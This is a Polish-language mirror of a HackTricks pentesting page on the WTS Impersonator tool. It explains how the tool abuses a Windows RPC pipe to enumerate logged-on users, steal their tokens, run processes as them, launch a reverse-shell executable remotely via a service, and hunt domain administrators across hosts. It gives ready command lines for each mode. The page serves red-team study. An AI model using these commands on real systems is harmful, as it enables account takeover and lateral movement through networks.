mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-11 22:03:10 +00:00
4.4 KiB
4.4 KiB
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.
Narzędzie WTS Impersonator wykorzystuje nazwaną rurę RPC "\pipe\LSM_API_service" do dyskretnego wyliczania zalogowanych użytkowników i przejmowania ich tokenów, omijając tradycyjne techniki podrobienia tokenów. Ta metoda ułatwia płynne poruszanie się po sieciach. Innowacyjność tej techniki przypisuje się Omri Baso, którego praca jest dostępna na GitHubie.
Główne funkcje
Narzędzie działa poprzez sekwencję wywołań API:
WTSEnumerateSessionsA → WTSQuerySessionInformationA → WTSQueryUserToken → CreateProcessAsUserW
Kluczowe moduły i użycie
- Wyszukiwanie użytkowników: Narzędzie umożliwia lokalne i zdalne wyszukiwanie użytkowników za pomocą odpowiednich poleceń:
- Lokalnie:
.\WTSImpersonator.exe -m enum
- Zdalnie, poprzez podanie adresu IP lub nazwy hosta:
.\WTSImpersonator.exe -m enum -s 192.168.40.131
- Wykonywanie poleceń: Moduły
exec
iexec-remote
wymagają kontekstu Usługi do działania. Lokalne wykonanie poleceń wymaga jedynie pliku wykonywalnego WTSImpersonator i polecenia: - Przykład wykonania lokalnego polecenia:
.\WTSImpersonator.exe -m exec -s 3 -c C:\Windows\System32\cmd.exe
- Aby uzyskać kontekst usługi, można użyć PsExec64.exe:
.\PsExec64.exe -accepteula -s cmd.exe
- Zdalne wykonanie poleceń: Polega na tworzeniu i instalowaniu usługi zdalnie, podobnie jak w przypadku PsExec.exe, umożliwiając wykonanie z odpowiednimi uprawnieniami.
- Przykład zdalnego wykonania:
.\WTSImpersonator.exe -m exec-remote -s 192.168.40.129 -c .\SimpleReverseShellExample.exe -sp .\WTSService.exe -id 2
- Moduł łowcy użytkowników: Celuje w określonych użytkowników na wielu maszynach, wykonując kod w oparciu o ich poświadczenia. Jest to szczególnie przydatne do celowania w administratorów domeny posiadających lokalne uprawnienia administratora na kilku systemach.
- Przykład użycia:
.\WTSImpersonator.exe -m user-hunter -uh DOMAIN/USER -ipl .\IPsList.txt -c .\ExeToExecute.exe -sp .\WTServiceBinary.exe
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi trikami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.